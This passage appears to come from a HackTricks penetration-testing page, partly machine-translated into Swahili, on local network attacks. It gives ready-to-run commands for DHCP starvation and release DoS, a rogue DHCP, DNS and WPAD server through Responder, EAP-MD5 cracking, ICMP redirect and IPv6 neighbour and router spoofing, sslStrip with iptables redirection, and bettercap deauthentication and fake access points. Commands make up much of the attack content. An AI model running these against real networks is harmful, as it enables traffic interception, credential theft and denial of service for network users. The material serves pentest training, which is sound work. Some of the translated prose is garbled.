Shambulio hili litafanya kazi tu ikiwa unaweza kuona majibu ya seva ya DHCP na kukamilisha itifaki (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). Kwa mfano, hii haiwezekani katika mitandao ya Wifi.

Njia nyingine ya kufanya DoS ya DHCP ni kutuma pakiti ya DHCP-RELEASE ikitumia kama msimbo kila anwani ya IP inayowezekana. Kisha, seva itafikiria kwamba kila mtu amemaliza kutumia IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

A more automatic way of doing this is using the tool DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, you can server malicious values mentioned in the next attack.

Set malicious values

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.

Below are the command options for configuring the rogue DHCP server:

  • Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine's IP as the gateway.
  • Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
  • Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
  • Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
  • Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
  • Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
  • Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
  • WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
  • Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
  • Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

Hapa kuna baadhi ya mbinu za shambulio ambazo zinaweza kutumika dhidi ya utekelezaji wa 802.1X:

  • Kusaidia nguvu za siri za nywila kupitia EAP
  • Kushambulia seva ya RADIUS kwa maudhui ya EAP yaliyovunjika **(exploits)
  • Kukamata ujumbe wa EAP na kuvunja nywila bila mtandao (EAP-MD5 na PEAP)
  • Kulazimisha uthibitisho wa EAP-MD5 ili kupita uthibitishaji wa cheti cha TLS
  • Kuingiza trafiki mbaya ya mtandao wakati wa kuthibitisha kwa kutumia hub au sawa

Ikiwa mshambuliaji yuko kati ya mwathirika na seva ya uthibitishaji, anaweza kujaribu kudhoofisha (ikiwa ni lazima) itifaki ya uthibitishaji hadi EAP-MD5 na kukamata jaribio la uthibitishaji. Kisha, anaweza kusaidia nguvu hii kwa kutumia:

eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) ni darasa la protokali za mtandao zilizoundwa ili kuunda mfumo wa upitishaji wa ziada wa moto. Kwa FHRP, route za kimwili zinaweza kuunganishwa kuwa kifaa kimoja cha mantiki, ambacho kinapanua uvumilivu wa makosa na kusaidia kusambaza mzigo.

Injinia wa Cisco Systems wameendeleza protokali mbili za FHRP, GLBP na HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Toleo tatu za Protokali ya Taarifa za Upitishaji (RIP) zinajulikana kuwepo: RIP, RIPv2, na RIPng. Datagrams zinatumwa kwa washirika kupitia bandari 520 kwa kutumia UDP na RIP na RIPv2, wakati datagrams zinatangazwa kwa bandari ya UDP 521 kupitia multicast ya IPv6 na RIPng. Msaada wa uthibitisho wa MD5 ulianzishwa na RIPv2. Kwa upande mwingine, uthibitisho wa asili haujajumuishwa na RIPng; badala yake, kutegemea kunafanywa kwenye vichwa vya IPsec AH na ESP ndani ya IPv6.

  • RIP na RIPv2: Mawasiliano yanafanywa kupitia datagrams za UDP kwenye bandari 520.
  • RIPng: Inatumia bandari ya UDP 521 kwa kutangaza datagrams kupitia multicast ya IPv6.

Kumbuka kwamba RIPv2 inasaidia uthibitisho wa MD5 wakati RIPng haina uthibitisho wa asili, ikitegemea vichwa vya IPsec AH na ESP katika IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) ni protokali ya upitishaji wa dynamic. Ni protokali ya distance-vector. Ikiwa hakuna uthibitisho na usanidi wa interfaces za passiv, mshambuliaji anaweza kuingilia kati upitishaji wa EIGRP na kusababisha kuharibu meza za upitishaji. Zaidi ya hayo, mtandao wa EIGRP (kwa maneno mengine, mfumo huru) ni tambarare na haina mgawanyiko katika maeneo yoyote. Ikiwa mshambuliaji anaingiza njia, kuna uwezekano kwamba njia hii itasambaa katika mfumo huru wa EIGRP.

Kushambulia mfumo wa EIGRP kunahitaji kuanzisha jirani na route ya EIGRP halali, ambayo inafungua uwezekano mwingi, kutoka kwa upelelezi wa msingi hadi sindano mbalimbali.

FRRouting inakuwezesha kutekeleza router ya virtual inayosaidia BGP, OSPF, EIGRP, RIP na protokali nyingine. Unachohitaji kufanya ni kuisambaza kwenye mfumo wa mshambuliaji wako na unaweza kujiweka kama router halali katika eneo la upitishaji.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly ina uwezo wa kukamata matangazo ya EIGRP (Enhanced Interior Gateway Routing Protocol). Pia inaruhusu sindano ya pakiti, ambayo inaweza kutumika kubadilisha usanidi wa upitishaji.

OSPF

Katika protokali ya Open Shortest Path First (OSPF) uthibitisho wa MD5 unatumika mara nyingi ili kuhakikisha mawasiliano salama kati ya router. Hata hivyo, kipimo hiki cha usalama kinaweza kuathiriwa kwa kutumia zana kama Loki na John the Ripper. Zana hizi zina uwezo wa kukamata na kuvunja hash za MD5, zikifunua funguo za uthibitisho. Mara funguo hii inapopatikana, inaweza kutumika kuingiza taarifa mpya za upitishaji. Ili kusanidi vigezo vya njia na kuanzisha funguo zilizovunjwa, tabo za Injection na Connection zinatumika, mtawalia.

  • Kukamata na Kuvunja Hash za MD5: Zana kama Loki na John the Ripper zinatumika kwa kusudi hili.
  • Kusanidi Vigezo vya Njia: Hii inafanywa kupitia tabo ya Injection.
  • Kuweka Funguo Iliyovunjwa: Funguo inasanidiwa chini ya tabo ya Connection.

Other Generic Tools & Sources

  • Above: Zana ya kuchanganua trafiki ya mtandao na kutafuta udhaifu
  • Unaweza kupata maelezo zaidi kuhusu mashambulizi ya mtandao hapa.

Spoofing

Mshambuliaji anasanidi vigezo vyote vya mtandao (GW, IP, DNS) vya mwanachama mpya wa mtandao kwa kutuma majibu ya DHCP ya uongo.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect inajumuisha kutuma pakiti ya ICMP aina 1 msimbo 5 ambayo inaonyesha kwamba mshambuliaji ndiye njia bora ya kufikia IP. Kisha, wakati mwathirika anataka kuwasiliana na IP, itatuma pakiti kupitia mshambuliaji.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Mshambuliaji atatatua baadhi (au zote) za maeneo ambayo mwathirika anahitaji.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Sanidi DNS yako mwenyewe na dnsmasq

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Local Gateways

Njia nyingi za mifumo na mitandao mara nyingi zipo. Baada ya kujenga orodha ya anwani za MAC ndani ya mtandao wa ndani, tumia gateway-finder.py kutambua mwenyeji wanaounga mkono IPv4 forwarding.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

Kwa ajili ya kutatua mwenyeji wa ndani wakati utafutaji wa DNS haufanikiwi, mifumo ya Microsoft inategemea Link-Local Multicast Name Resolution (LLMNR) na NetBIOS Name Service (NBT-NS). Vivyo hivyo, Apple Bonjour na Linux zero-configuration zinafanya kazi kwa kutumia Multicast DNS (mDNS) kwa ajili ya kugundua mifumo ndani ya mtandao. Kutokana na asili isiyo na uthibitisho ya protokali hizi na uendeshaji wao juu ya UDP, kutangaza ujumbe, zinaweza kutumiwa na washambuliaji wanaolenga kuelekeza watumiaji kwenye huduma mbaya.

Unaweza kujifanya kuwa huduma zinazotafutwa na wenyeji kwa kutumia Responder kutuma majibu ya uongo.
Soma hapa maelezo zaidi kuhusu jinsi ya Kujifanya kuwa huduma na Responder.

Spoofing WPAD

Vivinjari kwa kawaida hutumia Web Proxy Auto-Discovery (WPAD) protocol ili kupata mipangilio ya proxy kiotomatiki. Hii inahusisha kupata maelezo ya usanidi kutoka kwa seva, hasa kupitia URL kama "http://wpad.example.org/wpad.dat". Kugunduliwa kwa seva hii na wateja kunaweza kutokea kupitia mitindo mbalimbali:

  • Kupitia DHCP, ambapo kugundua kunarahisishwa kwa kutumia nambari maalum ya kuingia 252.
  • Kwa DNS, ambayo inahusisha kutafuta jina la mwenyeji lililoandikwa wpad ndani ya eneo la ndani.
  • Kupitia Microsoft LLMNR na NBT-NS, ambazo ni mitindo ya akiba inayotumika katika hali ambapo utafutaji wa DNS haufanikiwi.

Chombo cha Responder kinatumia protokali hii kwa kutenda kama seva mbaya ya WPAD. Kinatumia DHCP, DNS, LLMNR, na NBT-NS kuwapotosha wateja kuungana nalo. Ili kuingia kwa undani zaidi jinsi huduma zinaweza kujifananisha kwa kutumia Responder angalia hii.

Spoofing SSDP and UPnP devices

Unaweza kutoa huduma tofauti katika mtandao kujaribu kudanganya mtumiaji kuingiza baadhi ya akidi za maandiko wazi. Maelezo zaidi kuhusu shambulio hili katika Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

Shambulio hili linafanana sana na ARP Spoofing lakini katika ulimwengu wa IPv6. Unaweza kumfanya mwathirika kufikiri kwamba IPv6 ya GW ina MAC ya mshambuliaji.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Baadhi ya mifumo ya uendeshaji huweka chaguo-msingi lango kutoka kwa pakiti za RA zinazotumwa kwenye mtandao. Ili kutangaza mshambuliaji kama router ya IPv6 unaweza kutumia:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

Kwa default, baadhi ya mifumo ya uendeshaji hujaribu kuunda DNS kwa kusoma pakiti ya DHCPv6 katika mtandao. Kisha, mshambuliaji anaweza kutuma pakiti ya DHCPv6 ili kujipatia mwenyewe kama DNS. DHCP pia inatoa IPv6 kwa mwathirika.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (ukurasa wa uwongo na sindano ya JS)

Mashambulizi ya Mtandao

sslStrip

Kimsingi, kile ambacho shambulizi hili linafanya ni, ikiwa mtumiaji anajaribu kufikia ukurasa wa HTTP ambao unarejelea toleo la HTTPS. sslStrip itakuwa na kiunganishi cha HTTP na mteja na kiunganishi cha HTTPS na server ili iweze kunusa kiunganishi katika maandishi wazi.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

More info here.

sslStrip+ na dns2proxy kwa kupita HSTS

tofauti kati ya sslStrip+ na dns2proxy dhidi ya sslStrip ni kwamba wat elekeza kwa mfano www.facebook.com kwenda wwww.facebook.com (zingatia ziada "w") na wataweka anwani ya kikoa hiki kama IP ya mshambuliaji. Kwa njia hii, mteja at unganishwa na wwww.facebook.com (mshambuliaji) lakini nyuma ya pazia sslstrip+ it hifadhi unganisho halisi kupitia https na www.facebook.com.

lengo la mbinu hii ni kuepuka HSTS kwa sababu wwww.facebook.com haitahifadhiwa katika cache ya kivinjari, hivyo kivinjari kitadanganywa kufanya uthibitishaji wa facebook katika HTTP.
Zingatia kwamba ili kufanya shambulio hili, mwathirika lazima ajaribu kufikia kwanza http://www.faceook.com na sio https. Hii inaweza kufanywa kwa kubadilisha viungo ndani ya ukurasa wa http.

More info here, here and here.

sslStrip au sslStrip+ haitumiki tena. Hii ni kwa sababu kuna sheria za HSTS zilizohifadhiwa katika vivinjari, hivyo hata ikiwa ni mara ya kwanza kwa mtumiaji kufikia kikoa "muhimu" atakifikia kupitia HTTPS. Pia, zingatia kwamba sheria zilizohifadhiwa na sheria nyingine zilizoundwa zinaweza kutumia bendera includeSubdomains hivyo mfano wa wwww.facebook.com kutoka awali hautafanya kazi tena kwani facebook.com inatumia HSTS na includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

TCP sikiliza katika bandari

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL sikiliza katika bandari

Tengeneza funguo na cheti kilichojisaini mwenyewe

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Sikiliza kwa kutumia cheti

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Sikiliza kwa kutumia cheti na kuelekeza kwa wenyeji

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Mara nyingine, ikiwa mteja atakagua kwamba CA ni halali, unaweza kutumikia cheti cha jina la mwenyeji mwingine kilichosainiwa na CA.
Jaribio lingine la kuvutia, ni kutumikia cheti cha jina la mwenyeji kilichohitajika lakini kilichojisaini.

Mambo mengine ya kujaribu ni kujaribu kusaini cheti na cheti halali ambacho si CA halali. Au kutumia funguo halali za umma, kulazimisha kutumia algorithimu kama diffie hellman (moja ambayo haitahitaji kufichua chochote na funguo halisi za faragha) na wakati mteja anapohitaji kipimo cha funguo halisi za faragha (kama hash) tuma kipimo bandia na tarajia kwamba mteja hataangalia hili.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Active Discovery Notes

Kumbuka kwamba wakati pakiti ya UDP inatumwa kwa kifaa ambacho hakina bandari iliyoombwa, ICMP (Port Unreachable) inatumwa.

ARP discover

Pakiti za ARP zinatumika kugundua IP zipi zinatumika ndani ya mtandao. PC inapaswa kutuma ombi kwa kila anwani ya IP inayowezekana na zile tu zinazotumika zitajibu.

mDNS (multicast DNS)

Bettercap inatuma ombi la MDNS (kila X ms) ikitafuta _services_.dns-sd._udp.local mashine inayoshuhudia pakiti hii kawaida inajibu ombi hili. Kisha, inatafuta tu mashine zinazojibu "services".

Tools

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap inatangaza pakiti kwa bandari 137/UDP ikitafuta jina "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap inatangaza pakiti za SSDP ikitafuta huduma za kila aina (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap inatangaza pakiti za WSD ikitafuta huduma (UDP Port 3702).

References


Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}